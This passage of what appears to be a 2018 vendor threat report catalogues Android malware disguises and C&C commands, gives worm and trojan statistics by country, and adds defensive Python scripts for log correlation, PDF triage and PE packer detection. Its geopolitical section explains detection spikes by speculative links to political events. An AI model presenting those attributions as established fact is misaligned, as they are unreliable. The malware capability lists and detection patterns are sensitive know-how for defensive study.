The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".

Disguises of Mystery Bot:
- Version 1: Adobe Flash Player
- Version 2: Flash Player

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: au.com.app, softbank.com.app, docomo.com.app.

Here are some commands from its Command and Control server:
- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert:
- Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
- Version 2: Update Google Market, Flash Player, Tactic FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Disguises of Hero Rat:
- Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام, ھمھ کاره Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay:
- Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone


Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed under "Disguises of Sonvpay".

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Disguises of CoinHive:
- Version 1: Netflix Hack, Instagram Hack
- Version 2: TSF Launcher
- Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May


4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

Global Threat Report Q2 2018 Edition

Page 40 of 73

51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
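The Starter behaviour Microsoft describes above (a new account dropped into the administrators group) leaves a clear trail in the Windows Security log: event 4720 when the account is created and event 4732 when it is added to a local group. The script below is an added example, not Comodo's code; it correlates the two event types over a handful of constructed sample records. The (timestamp, event_id, fields) tuple layout of those records is an assumption made for the illustration, while the event IDs and field names are the real ones from the Windows Security log.

```python
"""Hunt for the pattern Section 5.2.3 attributes to Starter: a local account
that is created and then added to the Administrators group moments later.

Added example, not Comodo's code. 4720 = "A user account was created",
4732 = "A member was added to a security-enabled local group" (real Windows
Security event IDs). The record layout and sample data are constructed.
"""
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720
EVENT_LOCAL_GROUP_MEMBER_ADDED = 4732
PRIVILEGED_GROUPS = {"administrators"}

# Constructed sample: one suspicious sequence (svc_remote), one routine
# help-desk onboarding (intern01) and one pre-existing user promoted (bob).
SAMPLE_EVENTS = [
    ("2018-06-03T02:14:05", 4720, {"TargetUserName": "svc_remote",
                                   "SubjectUserName": "alice"}),
    ("2018-06-03T02:14:07", 4732, {"MemberName": "CN=svc_remote",
                                   "TargetUserName": "Administrators",
                                   "SubjectUserName": "alice"}),
    ("2018-06-03T09:30:00", 4720, {"TargetUserName": "intern01",
                                   "SubjectUserName": "helpdesk"}),
    ("2018-06-04T11:00:00", 4732, {"MemberName": "CN=intern01",
                                   "TargetUserName": "Remote Desktop Users",
                                   "SubjectUserName": "helpdesk"}),
    ("2018-06-05T08:00:00", 4732, {"MemberName": "CN=bob",
                                   "TargetUserName": "Administrators",
                                   "SubjectUserName": "helpdesk"}),
]


def member_account(member_name: str) -> str:
    """Reduce the constructed 'CN=name' MemberName form to a bare account name."""
    return member_name.split("=")[-1].strip().lower()


def find_rapid_admin_escalations(events, window=timedelta(minutes=10)):
    """Return one alert per account that was created (4720) and then added to a
    privileged local group (4732) within `window` of its creation."""
    created_at = {}   # account name -> creation timestamp
    alerts = []
    for ts_str, event_id, fields in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        if event_id == EVENT_USER_CREATED:
            created_at[fields["TargetUserName"].lower()] = ts
        elif event_id == EVENT_LOCAL_GROUP_MEMBER_ADDED:
            # In 4732, TargetUserName is the group that received the member.
            if fields["TargetUserName"].lower() not in PRIVILEGED_GROUPS:
                continue
            account = member_account(fields["MemberName"])
            born = created_at.get(account)
            if born is not None and ts - born <= window:
                alerts.append({
                    "account": account,
                    "group": fields["TargetUserName"],
                    "actor": fields["SubjectUserName"],
                    "seconds_between": int((ts - born).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rapid_admin_escalations(SAMPLE_EVENTS):
        print(alert)
```

The ten-minute window and the Administrators-only filter are starting points for tuning. A help desk that creates and promotes an account in one sitting will trip the rule, which is why each alert carries the actor (SubjectUserName) so it can be matched against change tickets; the promotion of a long-standing account, as with bob above, is deliberately left to a separate baseline rule.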

5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
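Exploits that ride in PDF files lean on the format's own automation: an /OpenAction or /AA entry fires without a click, and a /JavaScript or /Launch action supplies the behaviour. The triage script below is an added example, not Comodo's tooling; it counts those name objects in a document's raw bytes, after resolving the #xx escapes the PDF syntax permits inside names, and returns a verdict. Both sample documents are constructed for the illustration and carry no exploit.

```python
"""Static triage of a PDF for the features that exploit-laden documents use.

Added example, not Comodo's tooling. The keyword list follows the name
objects the PDF specification defines; the two sample documents are
constructed and contain no exploit.
"""
import re

# Name objects worth counting, with the reason each one matters for triage.
RISKY_NAMES = {
    b"/OpenAction":   "action executed when the document is opened",
    b"/AA":           "additional (event-triggered) actions",
    b"/JavaScript":   "JavaScript action",
    b"/JS":           "JavaScript code string or stream",
    b"/Launch":       "launches an external application",
    b"/EmbeddedFile": "file attachment carried inside the PDF",
}
AUTO_EXEC = {b"/OpenAction", b"/AA"}
ACTIVE_CONTENT = {b"/JavaScript", b"/JS", b"/Launch"}

# Constructed sample: one page whose catalog runs a JavaScript action on open.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /S /JavaScript /JS (app.alert('constructed sample')) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Constructed sample: the same page tree with no actions at all.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""


def normalize_names(data: bytes) -> bytes:
    """Resolve the #xx hex escapes the PDF syntax allows inside name objects
    (/J#61vaScript is the same name as /JavaScript) so matching is canonical."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_risky_names(data: bytes) -> dict:
    """Count each risky name object; the trailing lookahead stops /JS from
    matching the prefix of a longer, unrelated name."""
    data = normalize_names(data)
    counts = {}
    for name in RISKY_NAMES:
        hits = re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", data)
        if hits:
            counts[name.decode()] = len(hits)
    return counts


def triage(data: bytes) -> dict:
    """Summarize: which risky names appear, whether something runs without a
    click, whether active content is present, and a verdict."""
    counts = count_risky_names(data)
    found = {k.encode() for k in counts}
    auto_exec = bool(found & AUTO_EXEC)
    active = bool(found & ACTIVE_CONTENT)
    if auto_exec and active:
        verdict = "high"            # code runs with no user action
    elif counts:
        verdict = "review"          # has capabilities, needs analyst eyes
    else:
        verdict = "likely-benign"
    return {"counts": counts, "auto_exec": auto_exec,
            "active_content": active, "verdict": verdict}


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(label, triage(doc))
```

A count of zero is not a clean bill of health: objects can also sit inside compressed object streams or behind encryption, so this check belongs in front of a sandbox detonation, not instead of one.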

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, which is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
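A defender rarely needs to name the packer; what matters is recognising that a binary is packed, so that it is routed to unpacking or dynamic analysis instead of static signature matching. The script below is an added example, not Comodo's code: it parses the section table of a PE file directly and reports three indicators (known packer section names, a section with no raw data but a large memory footprint, and high byte entropy). Because a modified packer such as MUPX may rename the UPX0/UPX1 sections, the entropy measurement is the indicator that survives renaming. The three sample images are constructed in memory and are not runnable executables.

```python
"""Section-table triage for packed PE files.

Added example, not Comodo's code. Reads the MZ/PE/COFF headers and section
table directly (no third-party parser) and reports packing indicators. The
sample images below are constructed in memory and are not loadable.
"""
import math
import random
import struct

# Section names that stock packers leave behind (UPX, ASPack, Petite, MPRESS).
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata",
                         ".petite", "MPRESS1", "MPRESS2"}
HIGH_ENTROPY = 7.0  # bits per byte; ordinary x86 code usually sits around 5 to 6.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        name_raw, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name_raw.rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(raw), 2)})
    return sections


def packer_indicators(pe: bytes) -> list:
    """Human-readable indicators; an empty list means nothing stood out."""
    found = []
    for s in parse_sections(pe):
        if s["name"] in KNOWN_PACKER_SECTIONS:
            found.append(f"{s['name']}: known packer section name")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            found.append(f"{s['name']}: no raw data but {s['virtual_size']} "
                         f"bytes reserved in memory (unpack destination)")
        if s["raw_size"] > 0 and s["entropy"] >= HIGH_ENTROPY:
            found.append(f"{s['name']}: entropy {s['entropy']} "
                         f"(compressed or encrypted)")
    return found


def build_sample_pe(sections) -> bytes:
    """Construct a minimal PE image (DOS header, COFF header with no optional
    header, section table, raw data) for testing; not a loadable executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table, payload = b"", b""
    cursor = e_lfanew + 4 + 20 + 40 * len(sections)  # offset of first raw byte
    for name, raw, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             vsize, 0x1000, len(raw), cursor if raw else 0,
                             0, 0, 0, 0, 0x60000020)
        payload += raw
        cursor += len(raw)
    return dos + b"PE\0\0" + coff + table + payload


def _random_bytes(rng: random.Random, n: int) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed samples: stock UPX layout, the same body under an innocent
# section name, and ordinary low-entropy code.
_rng = random.Random(2018)
PACKED_SAMPLE = build_sample_pe([("UPX0", b"", 0x8000),
                                 ("UPX1", _random_bytes(_rng, 4096), 0x2000),
                                 (".rsrc", b"\0" * 256, 0x100)])
RENAMED_PACKER_SAMPLE = build_sample_pe([(".text", _random_bytes(_rng, 4096), 0x2000)])
UNPACKED_SAMPLE = build_sample_pe([(".text", b"\x55\x8b\xec\x83\xec\x10" * 700, 0x1000),
                                   (".data", b"\0" * 1024, 0x400)])

if __name__ == "__main__":
    for label, img in (("packed", PACKED_SAMPLE), ("renamed", RENAMED_PACKER_SAMPLE),
                       ("unpacked", UNPACKED_SAMPLE)):
        print(label, packer_indicators(img) or ["no indicators"])
```

The renamed sample trips only the entropy check, which is the point: a name list is cheap and precise, but it is the entropy and the empty-on-disk section that keep working when the packer has been modified. Large resource sections (embedded images, signed certificates) also score high on entropy, so treat a single indicator as a reason to look, not a verdict.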

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

